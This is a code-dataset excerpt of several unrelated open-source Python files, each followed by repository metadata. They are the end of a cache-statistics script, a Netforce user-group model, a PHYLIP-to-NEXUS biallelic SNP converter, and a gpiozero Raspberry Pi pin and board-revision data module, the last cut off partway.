def banner():
call(["clear"])
print '\n Cache Statistics\n ================\n'
return
#########################################################################################
#########################################################################################
def print_stat_line():
global hit, miss, bypass, expired
sys.stdout.write(' HIT: %5d MISS: %5d BYPASS: %5d EXPIRED: %5d\n'
% (hit, miss, bypass, expired))
return
#########################################################################################
#########################################################################################
if __name__ == "__main__":
main()
| apache-2.0 | -3,529,379,872,526,363,000 | 30.353659 | 89 | 0.318164 | false |
bank-netforce/netforce | netforce_general/netforce_general/models/user_group.py | 1 | 1497 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields
class Group(Model):
_name = "user.group"
_string = "Group"
_key = ["name"]
_fields = {
"name": fields.Char("Group Name", required=True, search=True),
"users": fields.Many2Many("base.user", "Users"),
"comments": fields.One2Many("message", "related_id", "Comments"),
}
_order = "name"
Group.register()
| mit | 9,020,449,533,256,077,000 | 41.771429 | 80 | 0.727455 | false |
tkchafin/scripts | phylip2biNumNex.py | 1 | 8129 | #!/usr/bin/python
import re
import sys
import os
import getopt
import operator
import random
def main():
params = parseArgs()
if params.phylip:
#Get sequences as dict of lists
seqs = readPhylip(params.phylip)
#get list of columns and list of samplenames
alen = getSeqLen(seqs)
columns = [[]for i in range(alen)]
names = list()
for key, value in seqs.items():
names.append(key)
for i, nuc in enumerate(value):
columns[i].append(nuc)
#For each column, delete those which are not bi-allelic
dels=list()
for i, col in enumerate(columns):
if not isBiallelic(col):
dels.append(i)
#print(i,"not biallelic:",col)
print("Deleting",len(dels),"non-biallelic columns.")
for col in sorted(dels,reverse=True): #reverse sorted so subsequent deletes aren't thrown off
#print(col,":",columns[col])
del columns[col]
#Then, convert to 012 format
print("Converting to 012 format...")
formatted = [[]for i in range(alen-len(dels))]
for i, col in enumerate(columns):
#print(col)
#print(nucs2numeric(col))
if params.nohet:
formatted[i] = nucs2numericNohet(col)
else:
formatted[i] = nucs2numeric(col)
#sys.exit()
final_data = dict()
for i, samp in enumerate(names):
seqs = list()
for k,nuc in enumerate(formatted):
seqs.append(nuc[i])
final_data[samp] = "".join(seqs)
print("Writing NEXUS output file...")
dict2nexus(params.out, final_data)
else:
print("No input provided.")
sys.exit(1)
#Function takes biallelic list of nucleotides and converts to numeric
#0 = major allele
#1 = minor allele
#2 = het
#? = - or N
def nucs2numeric(nucs):
if isBiallelic(nucs):
#print(nucs)
ret = list()
counts = {"A":0, "G":0, "C":0, "T":0}
#find major allele
for nuc in nucs:
if nuc not in ("-", "N"):
for exp in get_iupac_caseless(nuc):
counts[exp] += 1
#sort dict, to list of tuples (b/c dicts are orderless, can't keep as dict)
sorted_x = sorted(counts.items(), key=operator.itemgetter(1), reverse=True)
majA = sorted_x[0][0]
minA = sorted_x[1][0]
het = reverse_iupac(''.join(sorted(set([majA, minA])))) #get het code
#print(majA, minA, het)
for nuc in nucs:
nuc = nuc.upper()
if nuc == majA:
ret.append("0")
elif nuc == minA:
ret.append("1")
elif nuc == het:
ret.append("2")
elif nuc == "-":
ret.append("-")
else:
ret.append("?")
return(ret)
else:
print("Warning: Data is not biallelic:",nucs)
return(None)
#Function takes biallelic list of nucleotides and converts to numeric
#0 = major allele
#1 = minor allele
#2: Randomly samples heterozygous sites as 0 or 1
def nucs2numericNohet(nucs):
if isBiallelic(nucs):
#print(nucs)
ret = list()
counts = {"A":0, "G":0, "C":0, "T":0}
#find major allele
for nuc in nucs:
if nuc not in ("-", "N"):
for exp in get_iupac_caseless(nuc):
counts[exp] += 1
#sort dict, to list of tuples (b/c dicts are orderless, can't keep as dict)
sorted_x = sorted(counts.items(), key=operator.itemgetter(1), reverse=True)
majA = sorted_x[0][0]
minA = sorted_x[1][0]
het = reverse_iupac(''.join(sorted(set([majA, minA])))) #get het code
#print(majA, minA, het)
for nuc in nucs:
nuc = nuc.upper()
if nuc == majA:
ret.append("0")
elif nuc == minA:
ret.append("1")
elif nuc == het:
ret.append(random.randint(0,1))
elif nuc == "-":
ret.append("-")
else:
ret.append("?")
return(ret)
else:
print("Warning: Data is not biallelic:",nucs)
return(None)
#Function to translate a string of bases to an iupac ambiguity code
def reverse_iupac(char):
char = char.upper()
iupac = {
'A':'A',
'N':'N',
'-':'-',
'C':'C',
'G':'G',
'T':'T',
'AG':'R',
'CT':'Y',
'AC':'M',
'GT':'K',
'AT':'W',
'CG':'S',
'CGT':'B',
'AGT':'D',
'ACT':'H',
'ACG':'V',
'ACGT':'N'
}
return iupac[char]
#Function takes a list of nucleotides, and returns True if the column is biallelic
#ignores gaps and Ns
#expands uipac codes using a call to external function
def isBiallelic(nucs):
expanded = list()
for nuc in nucs:
if nuc not in ("-", "N"):
for exp in get_iupac_caseless(nuc):
expanded.append(exp)
uniq_sort = sorted(set(expanded))
if len(uniq_sort) != 2:
#print(nucs)
#print(uniq_sort, len(uniq_sort))
return(False)
else:
return(True)
#Function to split character to IUPAC codes, assuing diploidy
def get_iupac_caseless(char):
if char.islower():
char = char.upper()
iupac = {
"A" : ["A"],
"G" : ["G"],
"C" : ["C"],
"T" : ["T"],
"N" : ["A", "C", "G", "T"],
"-" : ["-"],
"R" : ["A","G"],
"Y" : ["C","T"],
"S" : ["G","C"],
"W" : ["A","T"],
"K" : ["G","T"],
"M" : ["A","C"],
"B" : ["C","G","T"],
"D" : ["A","G","T"],
"H" : ["A","C","T"],
"V" : ["A","C","G"]
}
ret = iupac[char]
return ret
#Function to read a phylip file. Returns dict (key=sample) of lists (sequences divided by site)
def readPhylip(phy):
if os.path.exists(phy):
with open(phy, 'r') as fh:
try:
num=0
ret = dict()
for line in fh:
line = line.strip()
if not line:
continue
num += 1
if num == 1:
continue
arr = line.split()
ret[arr[0]] = list(arr[1])
return(ret)
except IOError:
print("Could not read file ",fas)
sys.exit(1)
finally:
fh.close()
else:
raise FileNotFoundError("File %s not found!"%fas)
#Function to write an alignment as DICT to NEXUS
def dict2nexus(nex, aln):
with open(nex, 'w') as fh:
try:
slen = getSeqLen(aln)
header = "#NEXUS\n\nBegin data;\nDimensions ntax=" + str(len(aln)) + " nchar=" + str(slen) + ";\n"
header = header + "Format datatype=dna symbols=\"012\" missing=? gap=-;\nMatrix\n\n"
fh.write(header)
for seq in aln:
sline = str(seq) + " " + aln[seq] + "\n"
fh.write(sline)
last = ";\nEnd;\n"
fh.write(last)
except IOError:
print("Could not read file ",nex)
sys.exit(1)
finally:
fh.close()
#Goes through a dict of sequences and get the alignment length
def getSeqLen(aln):
length = None
for key in aln:
if not length:
length = len(aln[key])
else:
if length != len(aln[key]):
print("getSeqLen: Alignment contains sequences of multiple lengths.")
return(length)
#Object to parse command-line arguments
class parseArgs():
def __init__(self):
#Define options
try:
options, remainder = getopt.getopt(sys.argv[1:], 'p:ho:n', \
["phylip=","phy=","out=","nohet"])
except getopt.GetoptError as err:
print(err)
self.display_help("\nExiting because getopt returned non-zero exit status.")
#Default values for params
#Input params
self.phylip=None
self.out="out.nex"
self.nohet=False
#First pass to see if help menu was called
for o, a in options:
if o in ("-h", "-help", "--help"):
self.display_help("Exiting because help menu was called.")
#Second pass to set all args.
for opt, arg_raw in options:
arg = arg_raw.replace(" ","")
arg = arg.strip()
opt = opt.replace("-","")
#print(opt,arg)
if opt in ('p', 'phylip', 'phy'):
self.phylip = arg
elif opt in ('h', 'help'):
pass
elif opt in ('o','out'):
self.out = arg
elif opt in ('n','nohet'):
self.nohet=True
else:
assert False, "Unhandled option %r"%opt
#Check manditory options are set
if not self.phylip:
self.display_help("Error: Missing required phylip file (-p, --phylip)")
def display_help(self, message=None):
if message is not None:
print ("\n",message)
print ("\nphylip2biNumNex.py\n")
print ("Contact:Tyler K. Chafin, University of Arkansas,[email protected]")
print ("\nUsage: ", sys.argv[0], "-p /path/to/phylip \n")
print ("Description: Converts PHYLIP file to NEXUS file of only bi-allelic markers, coded with 012. As inputs for PhyloNetworks MLE_biMarkers or SNAPP")
print("""
Arguments:
-p,--popmap : Path to tab-delimited population map
-o,--out : Output file name <default = out.nex>
-n,--nohet : Randomly sample one allele from all heterozygous sites
-h,--help : Displays help menu
""")
sys.exit()
#Call main function
if __name__ == '__main__':
main()
| gpl-3.0 | 3,747,132,566,112,011,300 | 23.558912 | 154 | 0.615451 | false |
MrHarcombe/python-gpiozero | gpiozero/pins/data.py | 1 | 53566 | from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
str = type('')
import os
import sys
from textwrap import dedent
from itertools import cycle
from operator import attrgetter
from collections import namedtuple
from ..exc import PinUnknownPi, PinMultiplePins, PinNoPins, PinInvalidPin
# Some useful constants for describing pins
V1_8 = '1V8'
V3_3 = '3V3'
V5 = '5V'
GND = 'GND'
NC = 'NC' # not connected
GPIO0 = 'GPIO0'
GPIO1 = 'GPIO1'
GPIO2 = 'GPIO2'
GPIO3 = 'GPIO3'
GPIO4 = 'GPIO4'
GPIO5 = 'GPIO5'
GPIO6 = 'GPIO6'
GPIO7 = 'GPIO7'
GPIO8 = 'GPIO8'
GPIO9 = 'GPIO9'
GPIO10 = 'GPIO10'
GPIO11 = 'GPIO11'
GPIO12 = 'GPIO12'
GPIO13 = 'GPIO13'
GPIO14 = 'GPIO14'
GPIO15 = 'GPIO15'
GPIO16 = 'GPIO16'
GPIO17 = 'GPIO17'
GPIO18 = 'GPIO18'
GPIO19 = 'GPIO19'
GPIO20 = 'GPIO20'
GPIO21 = 'GPIO21'
GPIO22 = 'GPIO22'
GPIO23 = 'GPIO23'
GPIO24 = 'GPIO24'
GPIO25 = 'GPIO25'
GPIO26 = 'GPIO26'
GPIO27 = 'GPIO27'
GPIO28 = 'GPIO28'
GPIO29 = 'GPIO29'
GPIO30 = 'GPIO30'
GPIO31 = 'GPIO31'
GPIO32 = 'GPIO32'
GPIO33 = 'GPIO33'
GPIO34 = 'GPIO34'
GPIO35 = 'GPIO35'
GPIO36 = 'GPIO36'
GPIO37 = 'GPIO37'
GPIO38 = 'GPIO38'
GPIO39 = 'GPIO39'
GPIO40 = 'GPIO40'
GPIO41 = 'GPIO41'
GPIO42 = 'GPIO42'
GPIO43 = 'GPIO43'
GPIO44 = 'GPIO44'
GPIO45 = 'GPIO45'
# Board layout ASCII art
REV1_BOARD = """\
{style:white on green}+------------------{style:black on white}| |{style:white on green}--{style:on cyan}| |{style:on green}------+{style:reset}
{style:white on green}| {P1:{style} col2}{style:white on green} P1 {style:black on yellow}|C|{style:white on green} {style:on cyan}|A|{style:on green} |{style:reset}
{style:white on green}| {P1:{style} col1}{style:white on green} {style:black on yellow}+-+{style:white on green} {style:on cyan}+-+{style:on green} |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}| {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|SoC|{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:bold}Pi Model{style:normal} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:bold}{model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}|C|{style:black on white}+======{style:reset}
{style:white on green}| {style:on black}|S|{style:black on white}| Net{style:reset}
{style:white on green}| {style:on black}|I|{style:black on white}+======{style:reset}
{style:black on white}=pwr{style:on green} {style:on white}|HDMI|{style:white on green} |{style:reset}
{style:white on green}+----------------{style:black on white}| |{style:white on green}----------+{style:reset}"""
REV2_BOARD = """\
{style:white on green}+------------------{style:black on white}| |{style:white on green}--{style:on cyan}| |{style:on green}------+{style:reset}
{style:white on green}| {P1:{style} col2}{style:white on green} P1 {style:black on yellow}|C|{style:white on green} {style:on cyan}|A|{style:on green} |{style:reset}
{style:white on green}| {P1:{style} col1}{style:white on green} {style:black on yellow}+-+{style:white on green} {style:on cyan}+-+{style:on green} |{style:reset}
{style:white on green}| {P5:{style} col1}{style:white on green} |{style:reset}
{style:white on green}| P5 {P5:{style} col2}{style:white on green} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|SoC|{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:bold}Pi Model{style:normal} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:bold}{model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}|C|{style:black on white}+======{style:reset}
{style:white on green}| {style:on black}|S|{style:black on white}| Net{style:reset}
{style:white on green}| {style:on black}|I|{style:black on white}+======{style:reset}
{style:black on white}=pwr{style:on green} {style:on white}|HDMI|{style:white on green} |{style:reset}
{style:white on green}+----------------{style:black on white}| |{style:white on green}----------+{style:reset}"""
A_BOARD = """\
{style:white on green}+------------------{style:black on white}| |{style:white on green}--{style:on cyan}| |{style:on green}------+{style:reset}
{style:white on green}| {P1:{style} col2}{style:white on green} P1 {style:black on yellow}|C|{style:white on green} {style:on cyan}|A|{style:on green} |{style:reset}
{style:white on green}| {P1:{style} col1}{style:white on green} {style:black on yellow}+-+{style:white on green} {style:on cyan}+-+{style:on green} |{style:reset}
{style:white on green}| {P5:{style} col1}{style:white on green} |{style:reset}
{style:white on green}| P5 {P5:{style} col2}{style:white on green} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|SoC|{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:bold}Pi Model{style:normal} {style:on black}+---+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:bold}{model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}|C|{style:on green} |{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} |{style:reset}
{style:white on green}| {style:on black}|I|{style:on green} |{style:reset}
{style:black on white}=pwr{style:on green} {style:on white}|HDMI|{style:white on green} |{style:reset}
{style:white on green}+----------------{style:black on white}| |{style:white on green}----------+{style:reset}"""
BPLUS_BOARD = """\
{style:white on green},--------------------------------.{style:reset}
{style:white on green}| {J8:{style} col2}{style:white on green} J8 {style:black on white}+===={style:reset}
{style:white on green}| {J8:{style} col1}{style:white on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:black on white}+===={style:reset}
{style:white on green}| {style:bold}Pi Model {model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}+----+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:on black}|SoC |{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:on black}| |{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}+----+{style:on green} |{style:reset}
{style:white on green}| {style:on black}|C|{style:on green} {style:black on white}+======{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:black on white}| Net{style:reset}
{style:white on green}| {style:black on white}pwr{style:white on green} {style:black on white}|HDMI|{style:white on green} {style:on black}|I||A|{style:on green} {style:black on white}+======{style:reset}
{style:white on green}`-{style:black on white}| |{style:white on green}--------{style:black on white}| |{style:white on green}----{style:on black}|V|{style:on green}-------'{style:reset}"""
APLUS_BOARD = """\
{style:white on green},--------------------------.{style:reset}
{style:white on green}| {J8:{style} col2}{style:white on green} J8 |{style:reset}
{style:white on green}| {J8:{style} col1}{style:white on green} |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}| {style:bold}Pi Model {model:3s}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:white on green}| {style:on black}+----+{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|D|{style:on green} {style:on black}|SoC |{style:on green} {style:black on white}| USB{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} {style:on black}| |{style:on green} {style:black on white}+===={style:reset}
{style:white on green}| {style:on black}|I|{style:on green} {style:on black}+----+{style:on green} |{style:reset}
{style:white on green}| {style:on black}|C|{style:on green} |{style:reset}
{style:white on green}| {style:on black}|S|{style:on green} |{style:reset}
{style:white on green}| {style:black on white}pwr{style:white on green} {style:black on white}|HDMI|{style:white on green} {style:on black}|I||A|{style:on green} |{style:reset}
{style:white on green}`-{style:black on white}| |{style:white on green}--------{style:black on white}| |{style:white on green}----{style:on black}|V|{style:on green}-'{style:reset}"""
ZERO12_BOARD = """\
{style:white on green},-------------------------.{style:reset}
{style:white on green}| {J8:{style} col2}{style:white on green} J8 |{style:reset}
{style:white on green}| {J8:{style} col1}{style:white on green} |{style:reset}
{style:black on white}---+{style:white on green} {style:on black}+---+{style:on green} {style:bold}PiZero{style:normal} |{style:reset}
{style:black on white} sd|{style:white on green} {style:on black}|SoC|{style:on green} {style:bold}V{pcb_revision:3s}{style:normal} |{style:reset}
{style:black on white}---+|hdmi|{style:white on green} {style:on black}+---+{style:on green} {style:black on white}usb{style:on green} {style:black on white}pwr{style:white on green} |{style:reset}
{style:white on green}`---{style:black on white}| |{style:white on green}--------{style:black on white}| |{style:white on green}-{style:black on white}| |{style:white on green}-'{style:reset}"""
ZERO13_BOARD = """\
{style:white on green}.-------------------------.{style:reset}
{style:white on green}| {J8:{style} col2}{style:white on green} J8 |{style:reset}
{style:white on green}| {J8:{style} col1}{style:white on green} {style:black on white}|c{style:reset}
{style:black on white}---+{style:white on green} {style:on black}+---+{style:on green} {style:bold}Pi{model:6s}{style:normal}{style:black on white}|s{style:reset}
{style:black on white} sd|{style:white on green} {style:on black}|SoC|{style:on green} {style:bold}V{pcb_revision:3s}{style:normal} {style:black on white}|i{style:reset}
{style:black on white}---+|hdmi|{style:white on green} {style:on black}+---+{style:on green} {style:black on white}usb{style:on green} {style:on white}pwr{style:white on green} |{style:reset}
{style:white on green}`---{style:black on white}| |{style:white on green}--------{style:black on white}| |{style:white on green}-{style:black on white}| |{style:white on green}-'{style:reset}"""
CM_BOARD = """\
{style:white on green}+-----------------------------------------------------------------------------------------------------------------------+{style:reset}
{style:white on green}| Raspberry Pi Compute Module |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}| You were expecting more detail? Sorry, the Compute Module's a bit hard to do right now! |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}| |{style:reset}
{style:white on green}||||||||||||||||||||-||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||{style:reset}"""
# Pin maps for various board revisions and headers
REV1_P1 = {
# pin func pullup pin func pullup
1: (V3_3, False), 2: (V5, False),
3: (GPIO0, True), 4: (V5, False),
5: (GPIO1, True), 6: (GND, False),
7: (GPIO4, False), 8: (GPIO14, False),
9: (GND, False), 10: (GPIO15, False),
11: (GPIO17, False), 12: (GPIO18, False),
13: (GPIO21, False), 14: (GND, False),
15: (GPIO22, False), 16: (GPIO23, False),
17: (V3_3, False), 18: (GPIO24, False),
19: (GPIO10, False), 20: (GND, False),
21: (GPIO9, False), 22: (GPIO25, False),
23: (GPIO11, False), 24: (GPIO8, False),
25: (GND, False), 26: (GPIO7, False),
}
REV2_P1 = {
1: (V3_3, False), 2: (V5, False),
3: (GPIO2, True), 4: (V5, False),
5: (GPIO3, True), 6: (GND, False),
7: (GPIO4, False), 8: (GPIO14, False),
9: (GND, False), 10: (GPIO15, False),
11: (GPIO17, False), 12: (GPIO18, False),
13: (GPIO27, False), 14: (GND, False),
15: (GPIO22, False), 16: (GPIO23, False),
17: (V3_3, False), 18: (GPIO24, False),
19: (GPIO10, False), 20: (GND, False),
21: (GPIO9, False), 22: (GPIO25, False),
23: (GPIO11, False), 24: (GPIO8, False),
25: (GND, False), 26: (GPIO7, False),
}
REV2_P5 = {
1: (V5, False), 2: (V3_3, False),
3: (GPIO28, False), 4: (GPIO29, False),
5: (GPIO30, False), 6: (GPIO31, False),
7: (GND, False), 8: (GND, False),
}
PLUS_J8 = {
1: (V3_3, False), 2: (V5, False),
3: (GPIO2, True), 4: (V5, False),
5: (GPIO3, True), 6: (GND, False),
7: (GPIO4, False), 8: (GPIO14, False),
9: (GND, False), 10: (GPIO15, False),
11: (GPIO17, False), 12: (GPIO18, False),
13: (GPIO27, False), 14: (GND, False),
15: (GPIO22, False), 16: (GPIO23, False),
17: (V3_3, False), 18: (GPIO24, False),
19: (GPIO10, False), 20: (GND, False),
21: (GPIO9, False), 22: (GPIO25, False),
23: (GPIO11, False), 24: (GPIO8, False),
25: (GND, False), 26: (GPIO7, False),
27: (GPIO0, False), 28: (GPIO1, False),
29: (GPIO5, False), 30: (GND, False),
31: (GPIO6, False), 32: (GPIO12, False),
33: (GPIO13, False), 34: (GND, False),
35: (GPIO19, False), 36: (GPIO16, False),
37: (GPIO26, False), 38: (GPIO20, False),
39: (GND, False), 40: (GPIO21, False),
}
CM_SODIMM = {
1: (GND, False), 2: ('EMMC DISABLE N', False),
3: (GPIO0, False), 4: (NC, False),
5: (GPIO1, False), 6: (NC, False),
7: (GND, False), 8: (NC, False),
9: (GPIO2, False), 10: (NC, False),
11: (GPIO3, False), 12: (NC, False),
13: (GND, False), 14: (NC, False),
15: (GPIO4, False), 16: (NC, False),
17: (GPIO5, False), 18: (NC, False),
19: (GND, False), 20: (NC, False),
21: (GPIO6, False), 22: (NC, False),
23: (GPIO7, False), 24: (NC, False),
25: (GND, False), 26: (GND, False),
27: (GPIO8, False), 28: (GPIO28, False),
29: (GPIO9, False), 30: (GPIO29, False),
31: (GND, False), 32: (GND, False),
33: (GPIO10, False), 34: (GPIO30, False),
35: (GPIO11, False), 36: (GPIO31, False),
37: (GND, False), 38: (GND, False),
39: ('GPIO0-27 VREF', False), 40: ('GPIO0-27 VREF', False),
# Gap in SODIMM pins
41: ('GPIO28-45 VREF', False), 42: ('GPIO28-45 VREF', False),
43: (GND, False), 44: (GND, False),
45: (GPIO12, False), 46: (GPIO32, False),
47: (GPIO13, False), 48: (GPIO33, False),
49: (GND, False), 50: (GND, False),
51: (GPIO14, False), 52: (GPIO34, False),
53: (GPIO15, False), 54: (GPIO35, False),
55: (GND, False), 56: (GND, False),
57: (GPIO16, False), 58: (GPIO36, False),
59: (GPIO17, False), 60: (GPIO37, False),
61: (GND, False), 62: (GND, False),
63: (GPIO18, False), 64: (GPIO38, False),
65: (GPIO19, False), 66: (GPIO39, False),
67: (GND, False), 68: (GND, False),
69: (GPIO20, False), 70: (GPIO40, False),
71: (GPIO21, False), 72: (GPIO41, False),
73: (GND, False), 74: (GND, False),
75: (GPIO22, False), 76: (GPIO42, False),
77: (GPIO23, False), 78: (GPIO43, False),
79: (GND, False), 80: (GND, False),
81: (GPIO24, False), 82: (GPIO44, False),
83: (GPIO25, False), 84: (GPIO45, False),
85: (GND, False), 86: (GND, False),
87: (GPIO26, False), 88: ('GPIO46 1V8', False),
89: (GPIO27, False), 90: ('GPIO47 1V8', False),
91: (GND, False), 92: (GND, False),
93: ('DSI0 DN1', False), 94: ('DSI1 DP0', False),
95: ('DSI0 DP1', False), 96: ('DSI1 DN0', False),
97: (GND, False), 98: (GND, False),
99: ('DSI0 DN0', False), 100: ('DSI1 CP', False),
101: ('DSI0 DP0', False), 102: ('DSI1 CN', False),
103: (GND, False), 104: (GND, False),
105: ('DSI0 CN', False), 106: ('DSI1 DP3', False),
107: ('DSI0 CP', False), 108: ('DSI1 DN3', False),
109: (GND, False), 110: (GND, False),
111: ('HDMI CK N', False), 112: ('DSI1 DP2', False),
113: ('HDMI CK P', False), 114: ('DSI1 DN2', False),
115: (GND, False), 116: (GND, False),
117: ('HDMI D0 N', False), 118: ('DSI1 DP1', False),
119: ('HDMI D0 P', False), 120: ('DSI1 DN1', False),
121: (GND, False), 122: (GND, False),
123: ('HDMI D1 N', False), 124: (NC, False),
125: ('HDMI D1 P', False), 126: (NC, False),
127: (GND, False), 128: (NC, False),
129: ('HDMI D2 N', False), 130: (NC, False),
131: ('HDMI D2 P', False), 132: (NC, False),
133: (GND, False), 134: (GND, False),
135: ('CAM1 DP3', False), 136: ('CAM0 DP0', False),
137: ('CAM1 DN3', False), 138: ('CAM0 DN0', False),
139: (GND, False), 140: (GND, False),
141: ('CAM1 DP2', False), 142: ('CAM0 CP', False),
143: ('CAM1 DN2', False), 144: ('CAM0 CN', False),
145: (GND, False), 146: (GND, False),
147: ('CAM1 CP', False), 148: ('CAM0 DP1', False),
149: ('CAM1 CN', False), 150: ('CAM0 DN1', False),
151: (GND, False), 152: (GND, False),
153: ('CAM1 DP1', False), 154: (NC, False),
155: ('CAM1 DN1', False), 156: (NC, False),
157: (GND, False), 158: (NC, False),
159: ('CAM1 DP0', False), 160: (NC, False),
161: ('CAM1 DN0', False), 162: (NC, False),
163: (GND, False), 164: (GND, False),
165: ('USB DP', False), 166: ('TVDAC', False),
167: ('USB DM', False), 168: ('USB OTGID', False),
169: (GND, False), 170: (GND, False),
171: ('HDMI CEC', False), 172: ('VC TRST N', False),
173: ('HDMI SDA', False), 174: ('VC TDI', False),
175: ('HDMI SCL', False), 176: ('VC TMS', False),
177: ('RUN', False), 178: ('VC TDO', False),
179: ('VDD CORE', False), 180: ('VC TCK', False),
181: (GND, False), 182: (GND, False),
183: (V1_8, False), 184: (V1_8, False),
185: (V1_8, False), 186: (V1_8, False),
187: (GND, False), 188: (GND, False),
189: ('VDAC', False), 190: ('VDAC', False),
191: (V3_3, False), 192: (V3_3, False),
193: (V3_3, False), 194: (V3_3, False),
195: (GND, False), 196: (GND, False),
197: ('VBAT', False), 198: ('VBAT', False),
199: ('VBAT', False), 200: ('VBAT', False),
}
CM3_SODIMM = CM_SODIMM.copy()
CM3_SODIMM.update({
4: ('NC / SDX VREF', False),
6: ('NC / SDX VREF', False),
8: (GND, False),
10: ('NC / SDX CLK', False),
12: ('NC / SDX CMD', False),
14: (GND, False),
16: ('NC / SDX D0', False),
18: ('NC / SDX D1', False),
20: (GND, False),
22: ('NC / SDX D2', False),
24: ('NC / SDX D3', False),
88: ('HDMI HPD N 1V8', False),
90: ('EMMC EN N 1V8', False),
})
# The following data is sourced from a combination of the following locations:
#
# http://elinux.org/RPi_HardwareHistory
# http://elinux.org/RPi_Low-level_peripherals
# https://git.drogon.net/?p=wiringPi;a=blob;f=wiringPi/wiringPi.c#l807
PI_REVISIONS = {
# rev model pcb_rev released soc manufacturer ram storage usb eth wifi bt csi dsi headers board
0x2: ('B', '1.0', '2012Q1', 'BCM2835', 'Egoman', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV1_P1}, REV1_BOARD, ),
0x3: ('B', '1.0', '2012Q3', 'BCM2835', 'Egoman', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV1_P1}, REV1_BOARD, ),
0x4: ('B', '2.0', '2012Q3', 'BCM2835', 'Sony', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0x5: ('B', '2.0', '2012Q4', 'BCM2835', 'Qisda', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0x6: ('B', '2.0', '2012Q4', 'BCM2835', 'Egoman', 256, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0x7: ('A', '2.0', '2013Q1', 'BCM2835', 'Egoman', 256, 'SD', 1, 0, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, A_BOARD, ),
0x8: ('A', '2.0', '2013Q1', 'BCM2835', 'Sony', 256, 'SD', 1, 0, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, A_BOARD, ),
0x9: ('A', '2.0', '2013Q1', 'BCM2835', 'Qisda', 256, 'SD', 1, 0, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, A_BOARD, ),
0xd: ('B', '2.0', '2012Q4', 'BCM2835', 'Egoman', 512, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0xe: ('B', '2.0', '2012Q4', 'BCM2835', 'Sony', 512, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0xf: ('B', '2.0', '2012Q4', 'BCM2835', 'Qisda', 512, 'SD', 2, 1, False, False, 1, 1, {'P1': REV2_P1, 'P5': REV2_P5}, REV2_BOARD, ),
0x10: ('B+', '1.2', '2014Q3', 'BCM2835', 'Sony', 512, 'MicroSD', 4, 1, False, False, 1, 1, {'J8': PLUS_J8}, BPLUS_BOARD, ),
0x11: ('CM', '1.1', '2014Q2', 'BCM2835', 'Sony', 512, 'eMMC', 1, 0, False, False, 2, 2, {'SODIMM': CM_SODIMM}, CM_BOARD, ),
